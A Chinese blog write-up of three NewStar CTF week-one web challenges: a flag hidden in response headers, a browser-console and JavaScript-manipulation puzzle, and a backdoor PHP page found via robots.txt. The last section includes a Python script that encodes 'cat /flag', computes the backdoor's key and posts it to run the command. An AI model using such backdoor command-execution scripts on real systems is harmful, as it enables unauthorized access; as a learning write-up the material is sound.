当前位置: 首页 > article >正文

2025-1-21 Newstar CTF web week1 wp

文章目录

  • week1
    • headach3
    • 会赢吗
    • 智械危机

week1

headach3

根据提示,在页面的请求头里找到flag
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

在这里插入图片描述

会赢吗

打开控制台,拿到第一部分flag
在这里插入图片描述
将地址栏改为提示,去到下一关在这里插入图片描述
控制台调用函数,得到flag
在这里插入图片描述
进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去
在这里插入图片描述
看题解才发现原来是要修改if指向的条件值在这里插入图片描述
去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可

智械危机

进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入在这里插入图片描述
在这里插入图片描述
函数部分的逻辑好理解,接下来解释一下if部分的逻辑在这里插入图片描述
在这里插入图片描述在这里插入图片描述
所以我们所看到的当前网页其实就是else语句执行后的结果
在这里插入图片描述
在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell

from hashlib import *
from random import  *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={
    'cmd':base_cmd,
    'key':key
}
responce=post(url,data=payload)
print(responce.text)


http://www.kler.cn/a/513897.html

相关文章:

  • PHP语言的网络编程
  • vim文本编辑器
  • 美特CRM mcc_login.jsp存在SQL注入漏洞
  • 前端开发Web
  • 2024微短剧行业生态洞察报告汇总PDF洞察(附原数据表)
  • 记一次数据库连接 bug
  • 14-美妆数据分析
  • Java设计模式 十四 行为型模式 (Behavioral Patterns)
  • 【Spring】定义的Bean缺少隐式依赖
  • 解决npm install安装出现packages are looking for funding run `npm fund` for details问题
  • Spring中的事件和事件监听器是如何工作的?
  • GAN 用于图像增强
  • HTML新春烟花
  • 【25考研】考清华的软件工程专业的研究生需要准备什么?
  • 论文速读| A Survey on Data Synthesis and Augmentation for Large Language Models
  • 图片专栏——曝光度调整相关
  • 如何设置HSTS和OCSP Stapling?
  • js高阶-响应式原理
  • 线性规划:机器学习中的优化利器
  • NodeJs如何做API接口单元测试? --【elpis全栈项目】
  • Vue3初学之商品的增,删,改功能
  • Windows下建立Jupyter-lab 编程环境
  • STM32单片机:GPIO模式
  • gitlab使用多数据库
  • 知识图谱中的word2vec 技术是做什么的?
  • 机器学习10-解读CNN代码Pytorch版